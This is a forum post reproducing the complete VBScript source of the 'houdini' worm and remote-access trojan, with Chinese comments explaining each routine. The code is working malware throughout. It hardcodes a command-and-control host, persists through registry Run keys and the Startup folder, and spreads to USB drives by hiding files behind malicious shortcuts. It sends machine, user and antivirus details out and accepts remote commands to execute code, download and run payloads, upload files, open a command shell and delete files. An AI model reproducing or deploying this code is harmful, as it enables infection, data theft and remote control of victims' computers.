[Visual Basic] 纯文本查看 复制代码
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "j2w2d.no-ip.biz"
port = 81
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
'当前脚本名称(也就是脚本的文件名)
startup = shellobj.specialfolders ("startup") & "\"
'上面这句是获取开始菜单-程序文件夹的路径,再拼接上startup,即为开始菜单-程序-启动文件夹,WIN7系统为C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
’从环境变量中返回%appdata%文件夹,WIN7系统为C:\Users\Administrator\AppData\Roaming\
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
’如果不存在%appdata%文件夹,则切换为%temp% windows临时文件夹
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
'调用instance过程,作用为读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值,如果该键不存在,则写入,根键值则根据情况写入 "true - " & date 或 "false - " & date
while true
'循环体
install
'install过程就是查找连接到计算机并已经准备好的可移动磁盘,复制病毒脚本文件到该可移动磁盘中,并设置为隐藏+系统文件属性,然后将所有正常文件和子文件夹也都设置为系统+隐藏属性,并为所有正常文件和子文件夹创建快捷方式,目标参数在指向正常文件的同时指向病毒脚本
response = ""
response = post ("is-ready","")
'向网络服务器发送数据
cmd = split (response,spliter)
select case cmd (0)
'判断服务器返回参数
case "excecute"
'返回的第一个参数为"excecute" 则执行服务器返回的第二个参数
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
'以只写方式打开病毒脚本文件
oneonce.write param
'写入服务器返回的第一个参数
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
'不显示批处理错误及提示信息运行病毒脚本文件
wscript.quit
case "uninstall"
'返回的第一个参数为"uninstall"时,执行install过程的逆过程
uninstall
case "send"
'返回的第一个参数为"send"时,下载并运行返回的第二个参数文件和第三个参数文件
download cmd (1),cmd (2)
case "site-send"
'返回的第一个参数为"site-send"时,下载并运行返回的第二个参数文件和第三个参数文件
sitedownloader cmd (1),cmd (2)
case "recv"
'返回的第一个参数为"recv"时,通过网络升级病毒脚本文件,即返回的第二个参数文件
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
'返回的第一个参数为"delete"时,删除文件及文件夹
param = cmd (1)
deletefaf (param)
case "exit-process"
'返回的第一个参数为"exit-process"时,结束pid=param的进程
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
'upstart这个过程作用就是写注册表,将脚本加入开机启动,并复制脚本文件到%appdata%或%temp%文件夹
'下面这一大段就是感染代码了
for each drive in filesystemobj.drives
'遍历所有驱动器
if drive.isready = true then
'当插入移动磁盘准备接受访问时,IsReady才返回 True,可理解为当插入移动磁盘,并且系统已准备好进行读写,则执行下面代码
if drive.freespace > 0 then
'返回驱动器可用空间值,如果大于0则
if drive.drivetype = 1 then
'返回驱动器的类型,如果是可移动磁盘则
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
'复制脚本文件到可移动磁盘根目录
if filesystemobj.fileexists (drive.path & "\" & installname) then
'如果在可移动磁盘根目录存在这个脚本文件则
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
'设置可移动磁盘根目录的病毒脚本文件属性为隐藏+系统文件
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
'遍历可移动磁盘目录下的所有文件
if not lnkfile then exit for
'如果文件不是lnkfile 则退出循环
if instr (file.name,".") then
'如果文件名中存在"."这个字符串,则
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
'如果文件后缀后不等于"lnk",则
file.attributes = 2+4
'设置文件属性为隐藏+系统文件
if ucase (file.name) <> ucase (installname) then
’如果文件名不等于病毒脚本文件名则
filename = split(file.name,".")
'filename(0)=文件名
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
'在可移动磁盘根目录下创建该文件的快捷方式
lnkobj.windowstyle = 7
'设置为快捷方式使用的的窗口样式类型
lnkobj.targetpath = "cmd.exe"
'设置快捷方式的可执行文件的路径
lnkobj.workingdirectory = ""
'为快捷方式指派工作目录
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
'设置快捷方式目标参数,该参数除了指向正常文件本身,同时还指向病毒脚本
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
'读取注册表中该文件的图标样式并根据情况设置该快捷方式的图标
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
'保存快捷方式
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
'遍历可移动磁盘中所有子文件夹
if not lnkfolder then exit for
folder.attributes = 2+4
'设置文件夹属性为隐藏+系统文件夹
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
'为子文件夹创建快捷方式,下面代码跟上面都一样
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
'install过程的逆过程
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
'向网络服务器发送数据
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
'上面两句是写注册表,将脚本加入开机启动
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
'复制脚本文本到%appdata%或%temp%文件夹
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
'复制脚本文本到开始菜单-程序-启动文件夹
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
'读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值
if usbspreading = "" then
'如果不存在这个该键,则
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
'wscript.scriptfullname=当前脚本运行的完整路径,mid 取脚本完整路径的第二个字符到最后一个字符,如果这个前面获取的字符串等于":\"&lcase(installname),则执行下面两行代码,否则执行Else下面两行代码
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
'写注册表中usbspreading的这个键值,内容为 "true - " & date (date为系统日期)
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
'还是下载文件,参数为(下载文件URL,下载后保存的文件名)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
'下载文件函数(参数为下载文件URL,下载文件保存目录)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
[复制链接]
发表于 2014-1-13 05:46
